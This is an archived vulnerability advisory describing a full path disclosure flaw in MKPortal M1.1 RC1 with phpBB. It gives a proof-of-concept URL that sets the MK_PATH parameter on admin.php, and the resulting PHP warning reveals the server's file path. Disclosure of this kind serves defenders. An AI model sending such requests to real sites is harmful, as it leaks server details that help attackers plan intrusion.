TUCoPS :: Web :: CMS / Portals :: c07-1720.htm

MKPortal Full Path Disclosure
MKPortal Full Path Disclosure
MKPortal Full Path Disclosure



MkPortal Full Path Disclosure

Vulnerability discovered by: Demential
Web: http://headburn.altervista.org 
E-mail: info[at]burnhead[dot]it
Mkportal website: http://www.mkportal.it 

Tested on MKPortal M1.1 RC1 with PhpBB
other versions may also be affected.

http://www.victim.com/mkportal/admin.php?MK_PATH=1 

Warning:
main(mkportal/include/mk_mySQL.php):
failed to open stream:
No such file or directory in
D:\inetpub\webs\victimcom\mkportal\include\PHPBB\php_driverf.php on line 24

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH